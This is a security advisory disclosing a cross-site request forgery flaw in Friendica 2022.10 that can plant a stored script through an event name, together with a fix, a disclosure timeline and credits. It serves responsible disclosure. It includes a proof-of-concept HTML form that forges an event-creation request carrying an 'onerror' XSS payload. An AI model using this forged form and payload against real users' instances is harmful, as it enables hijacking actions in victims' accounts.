usd-2022-0049 | Friendica 2022.10 - Cross-Site Request Forgery (CSRF)

Advisory ID: usd-2022-0049
Product: Friendica
Affected Version: 2022.10
Vulnerability Type: Cross-Site Request Forgery (CSRF) (CWE-352)
Security Risk: High
Vendor URL: https://friendi.ca/
Vendor acknowledged vulnerability: Yes
Vendor Status: Fixed

Description

The open source application Friendica is used to set up a decentralized social network. The focus lies on effective privacy settings and interoperability with third-party services.
A CSRF vulnerability was identified during the creation of new events in friendica. This CSRF vulnerability can be used to trigger a self-xss vulnerability in the event name.

Proof of Concept

A malicous website can be created using the following snippet. Visiting the website will create a new event in their calendar containing JavaScript payload:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="[http://localhost/events"]() method="POST">
      <input type="hidden" name="event_id" value="0" />
      <input type="hidden" name="cid" value="0" />
      <input type="hidden" name="uri" value="http://localhost/objects/61ef0ae2-2163-6a90-40be-1a7639377312" />
      <input type="hidden" name="preview" value="0" />
      <input type="hidden" name="summary" value="&lt;img src=/X onerror=alert(document.domain)&gt;" />
      <input type="hidden" name="start_text" value="2022-11-08 18:46" />
      <input type="hidden" name="finish_text" value="2022-11-08 18:46" />
      <input type="hidden" name="nofinish" value="0" />
      <input type="hidden" name="share" value="0" />
      <input type="hidden" name="submit" value="Submit" />
      <input type="hidden" name="desc" value="" />
      <input type="hidden" name="location" value="" />
      <input type="hidden" name="visibility" value="public" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

If the victim visits their calendar, the secretly injected event will be executed in the context of the application:

Fix

Add CSRF tokens to all state changing requests (requests that cause actions on the site) and validate them on the backend.

References

Timeline

  • 2022-11-11: First contact request via info@friendi.ca
  • 2022-12-09: Submitted vulnerability to the vendor
  • 2022-12-20: Friendica 2022.12 released which fixes the submitted vulnerability

Credits

This security vulnerability was identified by Christian Pöschl of usd AG.